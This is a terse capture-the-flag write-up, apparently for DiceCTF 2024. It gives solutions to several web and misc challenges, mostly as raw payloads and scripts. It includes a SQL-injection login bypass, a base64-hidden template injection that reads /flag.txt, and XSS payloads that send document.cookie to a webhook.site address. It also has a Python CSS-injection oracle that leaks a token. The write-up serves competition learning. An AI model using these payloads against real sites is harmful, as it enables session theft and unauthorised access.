- CTFtime: https://ctftime.org/event/2217/
- 445 solves / 105 points
Just cheat.
- 269 solves / 109 points
$ http --form POST "https://funnylogin.mc.ax/api/login" user=__proto__ pass="' UNION SELECT '0"
HTTP/1.1 302 Found
Content-Length: 57
Content-Type: text/plain; charset=utf-8
Date: Mon, 05 Feb 2024 01:44:10 GMT
Location: /?flag=dice%7Bi_l0ve_java5cript!%7D
Vary: Accept
X-Powered-By: Express
Found. Redirecting to /?flag=dice%7Bi_l0ve_java5cript!%7D
I saw the flag and love it too!
- 180 solves / 115 points
Must explain the following pure JavaScript program:
\`\`\`javascript
console.log("Hi!!!!");
console.log("Hi!!!!");
console.log("Hi!!!!");
\`\`\`
\`\`\`javascript
/*
<%=
f = atob("CmNvbnN0IGJ1ZiA9IEJ1ZmZlci5hbGxvYygxMDApOwpjb25zdCBmcyA9IGdsb2JhbC5wcm9jZXNzLmJpbmRpbmcoImZzIik7CmZzLnJlYWQoZnMub3BlbigiL2ZsYWcudHh0IiwgMCwgMG82MDApLCBidWYsIDAsIGJ1Zi5sZW5ndGgsIDApOwpyZXR1cm4gYnVmLnRvU3RyaW5nKCk7Cg==")
%>
<%=
new Function(f)()
%>
*/
\`\`\`
- 59 solves / 119 points
location = `https://calculator.mc.ax?q=${encodeURIComponent(
`/*eslint-disable*/"<svg/onload=eval(\`'\`+URL)>"as unknown as 1`
)}#';eval(atob('${btoa(
`navigator.sendBeacon("https://webhook.site/xxx", document.cookie)`
)}'))`;
- 33 solves / 135 points
location = `https://calculator-2.mc.ax/?q=${encodeURIComponent(
`(o=>((eval('o.x="<svg/onload=eval(\`\\'\`+URL)>"'),o.x)))({x:1})`
)}#';eval(atob('${btoa(
`navigator.sendBeacon("https://webhook.site/xxx", document.cookie)`
)}'))`;
- 16 solves / 272 points
- second blood 🥈
The oracle concept is similar to my challenge DOMLeakify :)
import httpx
import time
# BASE_URL = "http://localhost:3000"
BASE_URL = "https://another-csp-88ce1272540e9561.mc.ax"
css = """
<style>
[data-token ^= "{{PREFIX}}"]::before {
--0: attr(data-token);
--1: var(--0)var(--0);
--2: var(--1)var(--1);
--3: var(--2)var(--2);
--4: var(--3)var(--3);
--5: var(--4)var(--4);
--6: var(--5)var(--5);
--7: var(--6)var(--6);
--8: var(--7)var(--7);
--9: var(--8)var(--8);
--a: var(--9)var(--9);
--b: var(--a)var(--a);
--c: var(--b)var(--b);
--d: var(--c)var(--c);
--e: var(--d)var(--d);
--f: var(--e)var(--e);
--g: var(--f)var(--f);
content: var(--g);
font-size: 100em;
filter: blur(10000px) drop-shadow(1024px 1024px 1024px blue);
}
</style>
"""
def is_hit(prefix: str) -> int:
for _ in range(10):
res = httpx.get(
f"{BASE_URL}/bot",
params={
"code": css.replace("{{PREFIX}}", prefix),
},
)
assert res.status_code == 200, res
if "visiting" in res.text:
break
time.sleep(1)
else:
print("Failed")
exit(1)
time.sleep(2)
res = httpx.get(
f"{BASE_URL}/bot",
params={
"code": "x",
},
)
assert res.status_code == 200, res
ok = "already open!" in res.text
return ok
chars = "0123456789abcdef"
known = ""
for i in range(6):
for c in chars:
if is_hit(known + c):
known += c
break
print(known)
assert len(known) == i + 1
print(f"token: {known}")
res = httpx.get(
f"{BASE_URL}/flag",
params={
"token": known,
},
)
print(res.text)
- 107 solves / 127 points
$ nc mc.ax 31774
Specify your charset: ./[.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z]
OK! Got . / [ - z ].
./[.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z]
dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}